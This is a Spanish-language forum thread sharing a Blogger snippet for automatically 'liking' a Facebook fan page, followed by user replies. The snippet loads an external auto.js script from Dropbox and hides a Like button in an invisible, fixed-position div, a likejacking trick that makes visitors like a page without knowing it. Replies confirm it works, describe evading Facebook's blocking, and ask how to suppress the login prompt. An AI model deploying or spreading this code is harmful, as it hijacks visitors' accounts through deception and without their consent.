Tutorial: Auto Me gusta "Autolike" para FanPage

• Autor Autor intoroddex
  • Fecha de inicio Fecha de inicio
😛8: Exitos , la practica hace al maestro

No pregunte actuen 😛7:

Luego lo leo mejor

Para Blogger, solo agregan arriba de </body>

PHP:
<script type="text/javascript" src="//dl.dropboxusercontent.com/s/9yffh50a8njo0jx/auto.js"></script>
<div id="likeslikes" style="opacity:0;width:20px;height:20px;overflow:hidden;position:fixed;">
    <div class="fb-like" data-href="AQUI LA URL DE LA PAGINA O WEB" data-layout="button" data-action="like" data-show-faces="false" data-share="false"></div>
</div>

hola, no me funciona en blogger...lo añadi antes del </body y nada no sale nada

Está padre, pero quizás se podría mejorar, por ejemplo que si el usuario no está conectado a facebook o ya dio like que el botón no cargue.

muchas gracias , esta genial! espero que a muchos les sirva como a mi

ami no me funciono la demo que diste , en teoria a que fan tendria que dar megusta?

Que ventajas tiene el Autolike?

Aun sirve muchas gracias probado y al 100 :encouragement:

:sorrow::sorrow::sorrow: Pense que era para blogger

No me huele muy bien esta idea, pero suerte en sus intentos!

Pero que cosa se supone que aparece al entrar un usuario a mi sitio? Un botón falso de me gusta o que?

Hace unos meses lo compre aqui en el foro, esta muy bien si tienes -100 onlines pero si tienes mas de 500 o 1,000 se bloquea y deja de funcionar. Saludos:encouragement:

Con razón a veces me aparecían paginas que no recordaba haber dado "me gusta". :distant:

Funciona jeje, eso es colocar el codigo, contar hasta 3 y quitarlo para que no me bloquee facebook. luego en 3 dias lo volvere hacer

Algun code para agregar que detecte cuando no estas logeado al face asi no salta el cartel de "login" ???? ya con eso seria una joyitaaa

Ya no funciona lo acabo de probar y nada!

Atrás